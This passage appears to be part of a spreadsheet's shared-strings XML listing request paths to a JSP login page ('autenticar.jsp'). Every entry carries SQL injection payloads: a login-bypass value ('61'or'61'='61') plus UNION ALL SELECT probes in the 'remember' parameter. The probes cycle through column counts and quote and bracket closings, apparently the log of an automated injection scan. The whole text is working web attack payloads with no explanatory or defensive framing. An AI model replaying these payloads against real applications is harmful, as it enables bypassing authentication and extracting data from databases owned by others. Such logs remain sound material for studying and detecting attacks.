    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null#and('qniz'like'qniz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null#and('yefu'like'yefu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null#and('lysa'like'lysa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null#and('zaqn'like'zaqn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null#and('heze'like'heze&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null#and('icqp'like'icqp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null#and('nidp'like'nidp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null#and('jmaj'like'jmaj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull#and(('falt'like'falt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null#and(('mcxu'like'mcxu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null#and(('yfwi'like'yfwi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null#and(('dxky'like'dxky&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null#and(('qlei'like'qlei&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null#and(('swxb'like'swxb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null#and(('lpxz'like'lpxz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null#and(('xqkm'like'xqkm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null#and(('fmnc'like'fmnc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null#and(('ddff'like'ddff&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull#and((('nmoi'like'nmoi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null#and((('srji'like'srji&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null#and((('zqmz'like'zqmz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null#and((('nczk'like'nczk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null#and((('relt'like'relt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null#and((('ffdf'like'ffdf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null#and((('tyfa'like'tyfa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null#and((('qzic'like'qzic&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null#and((('uted'like'uted&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null#and((('uakp'like'uakp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull#and'dkzu'like'dkzu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null#and'atxl'like'atxl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null#and'srrh'like'srrh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null#and'uemf'like'uemf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null#and'slqz'like'slqz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null#and'mfjl'like'mfjl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null#and'guaq'like'guaq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null#and'heet'like'heet&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null#and'lnei'like'lnei&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null#and'hxfk'like'hxfk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull#and("hzfm"="hzfm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null#and("kybg"="kybg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null#and("lvus"="lvus&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null#and("jckv"="jckv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null#and("qhba"="qhba&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null#and("tepn"="tepn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null#and("merm"="merm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null#and("pzqo"="pzqo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null#and("lsgf"="lsgf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null#and("uyfb"="uyfb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull#and(("jllf"="jllf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null#and(("twjf"="twjf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null#and(("bjjc"="bjjc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null#and(("qsts"="qsts&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null#and(("asyj"="asyj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null#and(("cchr"="cchr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null#and(("zssj"="zssj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null#and(("qjvg"="qjvg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null#and(("cshf"="cshf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null#and(("hknj"="hknj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull#and((("bsqk"="bsqk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null#and((("bemb"="bemb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null#and((("qbei"="qbei&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null#and((("apvw"="apvw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null#and((("azxk"="azxk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null#and((("lqut"="lqut&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null#and((("qbko"="qbko&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null#and((("fent"="fent&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null#and((("blul"="blul&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null#and((("pxtb"="pxtb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull#and"qxxe"="qxxe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null#and"jjjf"="jjjf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null#and"abnv"="abnv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null#and"axkp"="axkp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null#and"igpo"="igpo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null#and"gymq"="gymq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null#and"qhdz"="qhdz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null#and"oqjr"="oqjr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null#and"weuj"="weuj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null#and"ukie"="ukie&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull#and("btpd"like"btpd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null#and("wone"like"wone&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null#and("helv"like"helv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null#and("txmv"like"txmv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null#and("igox"like"igox&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null#and("jxjd"like"jxjd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null#and("mxzf"like"mxzf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null#and("lxes"like"lxes&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null#and("bfwv"like"bfwv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null#and("ovht"like"ovht&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull#and(("aqhl"like"aqhl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null#and(("ipav"like"ipav&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null#and(("jvjm"like"jvjm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null#and(("camc"like"camc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null#and(("piwj"like"piwj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null#and(("hueu"like"hueu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null#and(("wmxm"like"wmxm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null#and(("rtsg"like"rtsg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null#and(("gwoa"like"gwoa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null#and(("hjqf"like"hjqf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull#and((("ibbu"like"ibbu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null#and((("cubb"like"cubb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null#and((("vzrw"like"vzrw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null#and((("ywlf"like"ywlf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null#and((("uljl"like"uljl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null#and((("iyhg"like"iyhg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null#and((("gren"like"gren&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null#and((("jhxx"like"jhxx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null#and((("wuqi"like"wuqi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null#and((("gljb"like"gljb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull#and"ziyt"like"ziyt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null#and"qosm"like"qosm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null#and"pzvs"like"pzvs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null#and"xyzh"like"xyzh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null#and"ryoo"like"ryoo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null#and"vdak"like"vdak&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null#and"srrz"like"srrz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null#and"vdnc"like"vdnc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null#and"bbwv"like"bbwv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null#and"noue"like"noue&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6234#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect4987,4987#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2987,2987,2987#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect4849,4849,4849,4849#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9446,9446,9446,9446,9446#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1144,1144,1144,1144,1144,1144#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect4012,4012,4012,4012,4012,4012,4012#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7226,7226,7226,7226,7226,7226,7226,7226#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2185,2185,2185,2185,2185,2185,2185,2185,2185#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5870,5870,5870,5870,5870,5870,5870,5870,5870,5870#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5686#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6380,6380#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6012,6012,6012#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6107,6107,6107,6107#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8208,8208,8208,8208,8208#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7691,7691,7691,7691,7691,7691#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6964,6964,6964,6964,6964,6964,6964#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8513,8513,8513,8513,8513,8513,8513,8513#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8556,8556,8556,8556,8556,8556,8556,8556,8556#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6905,6905,6905,6905,6905,6905,6905,6905,6905,6905#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3438#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect373,373#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2117,2117,2117#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2664,2664,2664,2664#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6322,6322,6322,6322,6322#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6650,6650,6650,6650,6650,6650#&amp;modo=entrar</t>
